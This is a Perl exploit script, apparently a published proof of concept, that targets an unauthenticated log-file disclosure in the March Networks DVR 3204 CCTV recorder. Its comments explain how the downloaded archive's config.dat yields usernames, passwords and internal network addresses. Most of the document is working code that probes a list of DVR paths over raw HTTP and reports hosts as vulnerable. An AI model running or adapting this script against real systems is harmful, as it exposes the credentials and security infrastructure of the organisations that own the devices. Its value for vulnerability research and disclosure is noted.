#!/usr/bin/perl # # March Networks DVR 3204 Logfile Information Disclosure Exploit # # Since configuration of the IP address, user console and root is # carried out over the "administrator console", the vulnerability # lies within Watchdog's HTTP server application. # # Any user can obtain the log files without authentication by accessing # the following PATH http:/dvraddress/scripts/logfiles.tar.gz. The intruder # can then uncompress the tar file and access the config.dat to reveal # username and passwords, names of devices, and IP addresses of other # security components attached to the corporate networ # # More details: # http://www.sybsecurity.com/resources/static/ # An_Insecurity_Overview_of_the_March_Networks_DVR-CCTV_3204.pdf # # By Alex Hernandez ahernandez [at] sybsecurity [dot] com # # Usage: perl -x dvr3204_exp.pl www.marchnetworks.com:80 # Usage: perl -x dvr3204_exp.pl 127.0.0.1:80 # # $ perl -x dvr3204_exp.pl 10.50.10.246:80 # Trying... # # THIS HOST IS VULNERABLE!!! :-) # Check the details on w w w [dot] sybsecurity [dot] c o m # # THIS HOST IS NOT VULNERABLE :-( # Check the settings on browser... # # use Socket; if ($#ARGV<0) {die " \nMarch Networks DVR 3204 exploit\n More details: http://www.sybsecurity.com By Alex Hernandez\n ahernandez [at] sybsecurity [dot] com\n Usage: perl -x $0 www.marchnetworks.com:80 Usage: perl -x $0 127.0.0.1:80\n\n";} ($host,$port)=split(/:/,@ARGV[0]); print "Trying...\n\n"; $target = inet_aton($host); $flag=0; my @results=sendraw("GET /Level1Authenticate.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /UserAuthenticate.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/index.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/UpgradeStatus.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/UpgradeHistory.htm HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/UpgradeHistory.txt HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /public/dvrlog HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} my @results=sendraw("GET /scripts/logfiles.tar.gz HTTP/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /Directory/) {$flag=1;}} if ($flag==1){print "THIS HOST IS VULNERABLE!!! :-)\n Check the details on www [dot] sybsecurity [dot] com\n";} else {print "THIS HOST IS NOT VULNERABLE :-( \n Check the settings on browser...\n";} sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect check the port or address...\n"); } }